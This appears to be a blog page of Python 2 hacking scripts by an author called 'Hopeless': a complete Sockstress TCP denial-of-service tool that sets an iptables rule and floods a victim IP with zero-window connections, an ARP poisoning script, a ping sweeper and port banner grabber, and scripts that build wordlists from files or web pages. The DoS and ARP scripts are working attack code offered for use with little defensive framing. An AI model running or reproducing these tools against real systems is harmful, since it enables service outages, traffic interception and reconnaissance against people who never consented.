SockStress DoS – Python

Sockstress is a Denial of Service attack on TCP services

Untitled2.jpg

To copy or see all commands you can click on Details button below

 

#!/usr/bin/python

”’
author:Hopeless
task: SockStress DoS !
”’

from scapy.all import *
from time import sleep
import thread
import logging
import os
import sys

#before importing Scapy. This will suppress all messages that have a lower level of seriousness than error messages
logging.getLogger(“scapy.runtime”).setLevel(logging.ERROR)

if len(sys.argv) != 4:
print “Usage – ./sockstress.py [Victim-IP] [Port Num] [Threads Num]”
print “Example – ./sockstress.py 192.168.0.50 21 15”
print “Make sure beforehand that the port responds”
print “\nMake sure you remove the new rule created from iptables after you are using this program”
sys.exit()

victim = str(sys.argv[1])
portd = int(sys.argv[2])
threads = int(sys.argv[3])

# Create iptables rule
os.system(‘iptables -A OUTPUT -p tcp –tcp-flags RST RST -d ‘ + victim + ‘ -j DROP’)

# Starting attack ūüôā
def sockstress(victim,portd):
while 0 == 0:
try:
x = random.randint(0,65535)
response = sr1(IP(dst=victim)/TCP(sport=x,dport=portd,flags=’S’),timeout=1,verbose=0)
send(IP(dst=victim)/TCP(dport=portd,sport=x,window=0,flags=’A’,ack=(response[TCP].seq + 1))/’\x00\x00′,verbose=0)
except:
pass

#multiple threads attack
print “The onslaught has begun…use Ctrl+C to stop the attack”
print “\nMake sure you remove the new rule created from iptables after you are using this program”
for x in range(0,threads):
thread.start_new_thread(sockstress, (victim,portd))

# Stop only if you press Ctrl+C
while 0 == 0:
sleep(1)

 

Advertisements

ARP Poison – Python

ARP Poisoning
The attacking system, instead of posing as a gateway and performing a man in the middle attack, can instead simply drop the packets, causing the clients to be denied service to the attacked network resource. The spoofing of ARP messages is the tributary principal of ARP Poisoning.

Used:
from scapy.all import *
import sys

Untitled.jpgTo copy or see all commands you can click on Details button below

 

 

 

#!/usr/bin/python

”’
author: Hopeless
task: Arp poison !
”’

from scapy.all import *
import sys

def get_mac_add():
my_macs = [get_if_hwaddr(i) for i in get_if_list()]
for mac in my_macs:
if(mac != “00:00:00:00:00:00”):
return mac
Timeout=3

if len(sys.argv) != 3:
print “Usage: arppois.py VICTIM-IP IP-TO-IMPERSONATE”
sys.exit(1)

my_mac = get_mac_add()
if not my_mac:
print “Error, Cant get local mac address”
sys.exit(1)

pkt = Ether()/ARP(op=”who-has”,hwsrc=my_mac,psrc=sys.argv[2],pdst=sys.argv[1])

sendp(pkt)

 

 

 

Port scanner and banner grabber – Python

Port scanner and banner grabber:

ping scanner and port banners
    The software can perform:
    РTest ip-is-online
    РChecking whether the port is open at the IP-online
    РIf an open port system shows banner
    РThe system exports data file with all of the scan

    You can enter at the Ip, ip / sider, ip-range, http
    You can enter a list of ports, port manually or scan the list of ports are recommended.
    You can select the file name to export the data or the system automatically saves

Used: import sys , socket , getopt , subprocess
from scapy.all import *
from netaddr import *
from datetime import datetime

Screenshot from 2016-08-10 05:25:03.png
Screenshot from 2016-08-10 05:25:42.png
Screenshot from 2016-08-10 05:26:44.png
To copy or see all commands you can click on Details button below

#!/usr/bin/python

”’
author: Hopeless
task: ping scanner and port banners
The software can perform:
– Test ip-is-online
– Checking whether the port is open at the IP-online
– If an open port system shows banner
– The system exports data file with all of the scan

You can enter at the Ip, ip / sider, ip-range, http
You can enter a list of ports, port manually or scan the list of ports are recommended.
You can select the file name to export the data or the system automatically saves

”’
import sys, socket , getopt ,subprocess
from scapy.all import *
from netaddr import *
from datetime import datetime

# clear the screen
subprocess.call(‘clear’,shell=True)
socket.setdefaulttimeout(2)
TIMEOUT = 2
conf.verb = 0
portlist = [20,21,22,25,3389,80,443]
argv = sys.argv[1:]
subnet = []
output = ‘save.txt’
answers = []
liveIPs = []

#Checking what has been entered
try:
opts,args = getopt.getopt(argv,’hi:p:o:’)
except getopt.GetoptError:
print ‘portscanner.py -i ip/sider or ip-range or http \nfor more exmple use : portscanner.py -h’
sys.exit(2)
for option,arg in opts:
if option in ‘-h’:
print ‘\nexmple:’
print ‘portscanner.py -i 10.0.0.1/24 or 10.0.0.1-15 or http://www.ynet.co.il \n’
print ‘-p 20,22,100,101 \n(if this option is not selected, automatically are who chose the recommended port)\n’
print ‘-o save.txt \n(if this option is not selected, automatically this file save in save.txt)\n’
print ‘for exmple:\nportscanner.py -i 10.0.0.1-3 -p 22,3389 -o ports.txt’
sys.exit()
if option in ‘-i’:
subnet = arg
elif option in ‘-o’:
output = arg
elif option in (‘-p’):
portadd = []
portcheck = arg.split(‘,’)
for portsplit in portcheck:
portadd.append(int(portsplit))
portlist = portadd
else:
print ‘portscanner.py -i ip/sider or ip-range or http \nfor more exmple use : portscanner.py -h’
sys.exit()

#checks if ip/sider or ip-range or http
if subnet:
try:
subnet = IPNetwork(subnet)
except Exception, e:
if ‘-‘ in subnet:
ipall =[]
subnet = subnet.split(‘-‘)
ipfirst = subnet[0]
ips = ipfirst.split(‘.’)
iptmp = ips[0]+’.’+ips[1]+’.’+ips[2]+’.’
for i in range(int(ips[3]),(int(subnet[1])+1)):
ip = iptmp+str(i)
ipall.append(ip)
subnet = ipall
elif subnet[0].isalpha():
subnethost = socket.gethostbyname(arg)
subnet = IPNetwork(subnethost)
else:
print ‘bad ip or url , for help (portscanner.py -h)’
sys.exit()

while not subnet:
print ‘portscanner.py -i ip/sider or ip-range or http’
print ‘for exmple:\nportscanner.py -i 10.0.0.1-3 -p 22,3389 -o ports.txt’
print ‘for more exmple use : portscanner.py -h’
sys.exit(2)

# Checking reply address from ip
def isAlive(ip):
ppkt = IP(dst=ip,ttl=64)/ICMP()
# this will recieve the answer (if…)
reply = sr1(ppkt,timeout=TIMEOUT)
# check if answered
if not (reply is None):
print reply[IP].src, ‘[+] is online’
liveIPs.append(reply[IP].src)
else:
print ip,'[-] timed out’

return liveIPs

#Checking reply port, if it gives banner
def getBanner(ip,portlist):
for port in portlist:
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
result = s.connect_ex((ip,port))
if result ==0:
ans = s.recv(1024)
print “Port {}: Open”.format(port)
print ‘found ->’,’ip:’, ip, ‘port:’,port, ‘banner:’, str(ans)
answ =’ip:’, ip, ‘port:’,port, ‘banner:’, str(ans)
answers.append(answ)
s.close()
except Exception, e:
print ‘bad port’,port,’, please try again…’
pass
s.close()

# main func
if __name__ == ‘__main__’:
# Check the time at started
t1 = datetime.now()
#Loop ip-live from the address entered
for ip in subnet:
alive = isAlive(str(ip))
#Loop banner from addresses are available
for ip in liveIPs:
banners = getBanner(ip,portlist)
# Saves the file
save = open(output,”w”)
save.write(str(answers))
save.close()

# Checking the time again
t2 = datetime.now()
# Calculates the difference of time
total = t2 – t1
print ‘scanning completed in:’,total

exmple:
(use with sudo)

hopeless@ubuntu:~/python$ sudo ./portscanner.py -i 172.16.14.0/24 -p 20,21,22


Source code …
portscanner.py

Get dictionary from file/url – Python

Get dictionary from file:

This program get all word from any file

Used: import (sys, os, re) , if , try , for , except , else

get-word-from-file.png
To copy or see all commands you can click on Details button below

 

#!/usr/bin/python
”’
author: Hopeless
task: Write a program that takes a file a generates a wordlist
prog will get all words from any text file
”’

import sys, os, re

wordlist = []
# filename = raw_input(‘please enter filename to parse:’)

if len(sys.argv) > 1:
try:

filex = open(sys.argv[1],’r’)
for line in filex:
wordlist += re.findall(r'([0-9a-zA-Z_]{3,15})[\s\\\.]’,line)
#print wordlist

except Exception, e:
print e
exit(0)

filex.close()
wordset = set(wordlist)

print wordset
print ‘dic length is: ‘, len(wordset)

#save wordset to file -> newline for each item
realdic = open(‘realdic.txt’,’w’)
for word in wordset:
realdic.write(word+’\n’)

realdic.close()

 

hopeless@ubuntu:~/python$ wget https://en.wikipedia.org/wiki/Israel
hopeless@ubuntu:~/python$ ./baddic.py Israel
(all result save to file “realdic.txt”)


another way to get dictionary from file:

This program get all word from any file

Used: def , import (sys, os, re) , if , try , for , except , else

Screenshot from 2016-08-10 04:02:06.png
To copy or see all commands you can click on Details button below

 

#!/usr/bin/python
”’
author: Hopeless
task: prog will get all words from any text file
”’

import sys, os, re

if len(sys.argv) > 1:
try:
filex = open(sys.argv[1],’r’)

except Exception, e:
print e
exit(0)
# filename = raw_input(‘please enter filename to parse:’)

def text2dic(filename):
wordlist = []
for line in filename:
wordlist += re.findall(r'([0-9a-zA-Z_]{3,15})[\s\\\.]’,line)
wordset = set(wordlist)
return wordset

def savedic(listname, filename):
try:
realdic = open(filename,’w’)
for word in listname:
realdic.write(word+’\n’)
realdic.close()
except Exception, e:
print e
exit(0)

newdic = text2dic(filex)
savedic(newdic,’test1.dic’)

print newdic
print ‘dic length is: ‘, len(newdic)

filex.close()

 

hopeless@ubuntu:~/python$ wget https://en.wikipedia.org/wiki/Israel
hopeless@ubuntu:~/python$ ./dicfuncs.py Israel
(all result save to file “test1.dic”)


Get dictionary from url:

This program get all word from any url

Used: import (sys, os, re) , if , try , for , except , else

get-word-from-url.png
To copy or see all commands you can click on Details button below

#!/usr/bin/python

”’
author: Hopeless
task: prog will get all words from any url
”’

import sys, os, re
from urllib2 import urlopen
wordlist = []
# filename = raw_input(‘please enter filename to parse:’)

if len(sys.argv) > 1:
try:
urlf = urlopen(sys.argv[1],’r’)
for line in urlf:
wordlist += re.findall(r'([0-9a-zA-Z_]{3,15})[\s\\\.]’,line)
#print wordlist

except Exception, e:
print e
exit(0)

urlf.close()
wordset = set(wordlist)

print wordset
print ‘dic length is: ‘, len(wordset)

#save wordset to file -> newline for each item
realdic = open(‘realdic.txt’,’w’)
for word in wordset:
realdic.write(word+’\n’)

realdic.close()

hopeless@ubuntu:~/python$ ./passdicurl.py https://en.wikipedia.org/wiki/Israel
(all result save to file “realdic.txt”)


Results!
Screenshot from 2016-08-10 04:00:02.png